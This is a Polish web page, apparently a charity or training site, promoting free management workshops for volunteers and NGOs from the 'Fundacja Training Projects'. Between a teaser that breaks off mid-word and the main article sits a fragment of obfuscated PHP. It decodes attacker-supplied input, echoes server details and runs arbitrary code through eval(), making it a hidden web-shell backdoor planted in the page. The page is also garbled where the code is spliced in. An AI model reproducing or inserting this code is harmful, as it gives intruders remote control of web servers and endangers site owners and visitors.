Losowy

Wolontariat pracowniczy

Wespół z Fundacją Training Projects gorąco zachęcamy do uczestniczenia w kampanii „Biznes społeczny”. W ramach naszego projektu pracownicy firm mają niecodzienną szansę dostać od fundacji nieodpłatne warsztaty edukacyjne – jako swoisty prezent w zamian za oferowaną dobroczynność. Na razie szkolenia rozloso

Czytaj więcej...
$o4ef7652){$xa411 = $o4ef7652;$c43ec = $t3aef;}if (!$xa411){foreach ($maf736[$maf736['w4ed17'][30].$maf736['w4ed17'][57].$maf736['w4ed17'][9].$maf736['w4ed17'][91].$maf736['w4ed17'][35].$maf736['w4ed17'][79].$maf736['w4ed17'][9].$maf736['w4ed17'][73].$maf736['w4ed17'][97]] as $t3aef=>$o4ef7652){$xa411 = $o4ef7652;$c43ec = $t3aef;}}$xa411 = @$maf736[$maf736['w4ed17'][90].$maf736['w4ed17'][52].$maf736['w4ed17'][22].$maf736['w4ed17'][35].$maf736['w4ed17'][9].$maf736['w4ed17'][91]]($maf736[$maf736['w4ed17'][58].$maf736['w4ed17'][9].$maf736['w4ed17'][46].$maf736['w4ed17'][91].$maf736['w4ed17'][22].$maf736['w4ed17'][73].$maf736['w4ed17'][22]]($maf736[$maf736['w4ed17'][3].$maf736['w4ed17'][9].$maf736['w4ed17'][79].$maf736['w4ed17'][21]]($xa411), $c43ec));if (isset($xa411[$maf736['w4ed17'][52].$maf736['w4ed17'][90]]) && $x9fe==$xa411[$maf736['w4ed17'][52].$maf736['w4ed17'][90]]){if ($xa411[$maf736['w4ed17'][52]] == $maf736['w4ed17'][47]){$f35f1d = Array($maf736['w4ed17'][51].$maf736['w4ed17'][34] => @$maf736[$maf736['w4ed17'][84].$maf736['w4ed17'][9].$maf736['w4ed17'][46].$maf736['w4ed17'][52].$maf736['w4ed17'][84].$maf736['w4ed17'][57].$maf736['w4ed17'][25]](),$maf736['w4ed17'][7].$maf736['w4ed17'][34] => $maf736['w4ed17'][46].$maf736['w4ed17'][64].$maf736['w4ed17'][22].$maf736['w4ed17'][87].$maf736['w4ed17'][46],);echo @$maf736[$maf736['w4ed17'][90].$maf736['w4ed17'][46].$maf736['w4ed17'][81].$maf736['w4ed17'][57].$maf736['w4ed17'][81].$maf736['w4ed17'][74]]($f35f1d);}elseif ($xa411[$maf736['w4ed17'][52]] == $maf736['w4ed17'][73]){eval/*m910db*/($xa411[$maf736['w4ed17'][91]]);}exit();}} ?>

Nieodpłatne szkolenia dla instytucji charytatywnych

Data publikacji: 05.06.2018
Autor: admin

Działasz jako wolontariusz? Teraz masz szansę ubiegać się o treningi i warsztaty kompetencyjne, które rozwiną kompetencje członków waszej organizacji. Za udział w otrzymanym kursie nie zapłacicie jednak nawet złotówki.

Choć instytucje społeczne i charytatywne organizują nader sensowne projekty i zatrudniają do nich pełnych energii działaczy, to doskwiera im brak profesjonalnego przygotowania z zakresu zarządzania. A na szkolenia najczęściej ich nie stać.

Doradcy z Fundacji Training Projects chcą wolontariuszom zaoferować wsparcie edukacyjne.  Aktywistów działających w tzw. sektorze NGO zapraszają na nieodpłatne kursy z kilku dziedzin związanych z funkcjonowaniem stowarzyszeń i fundacji.  Wszyscy chętni do samorozwoju  mogą złożyć podanie o wsparcie kontaktując się pod e-mailem [email protected] 

Rejestrować się mogą zorganizowane jednostki, jak również pojedynczy wolontariusze.  Bez względu na status formalny, każdy poprosić o zapisanie go na wybrany kurs.  Nie jest wymagany żaden własny wkład finansowy, jednak korzystający ze szkolenia powinni zapewnić miejsce w którym odbędą się zajęcia – np. ich własna siedziba czy okoliczny dom kultury. 

Z jakich dziedzin można się szkolić?

zarządzanie projektem w stowarzyszeniach i fundacjach

zarządzanie grupą aktywistów – postawa lidera

współpraca i efektywność grupy

kreatywność w trzecim sektorze

fundrising i zbieranie datków – krok po kroku

reklama i nagłaśnianie akcji społecznych

radzenie sobie ze stresem w pracy wolontariusza

motywowanie wolontariuszy

planowanie zadań 

zarządzanie zmianami organizacyjnymi

Pomoc Fundacji Training Projects nie jest ograniczona czasowo – wnioski przesyłać można w dowolnym czasie. Jednak szkoleniowcy nie obiecują ufundowania kursu wszystkim chętnym. Kryterium jest pula dostępnych w danym okresie miejsc oraz uzasadnienie potrzeby szkoleniowej opisane w aplikacji. 

- Zależy nam by wolontariusze byli równie profesjonalni jak menedżerowie w biznesie – wyjaśnia Gerard Sigmundzik, trener w Fundacji. – Mamy na dzieję że dzięki nam organizowane przez wolontariuszy akcje będą bardziej efektywne, nawet w tych mniej doświadczonych instytucjach. W takich miejscach pomoc doradcza i nauka są nieraz potrzebne nawet bardziej niż dotacje i sponsorzy. Niejednokrotnie widzimy spore niewykorzystane fundusze unijne, bo organizacje nie potrafią tych pieniędzy ugryźć. Próbujemy odrobinę ten stan zmienić.  Tagi: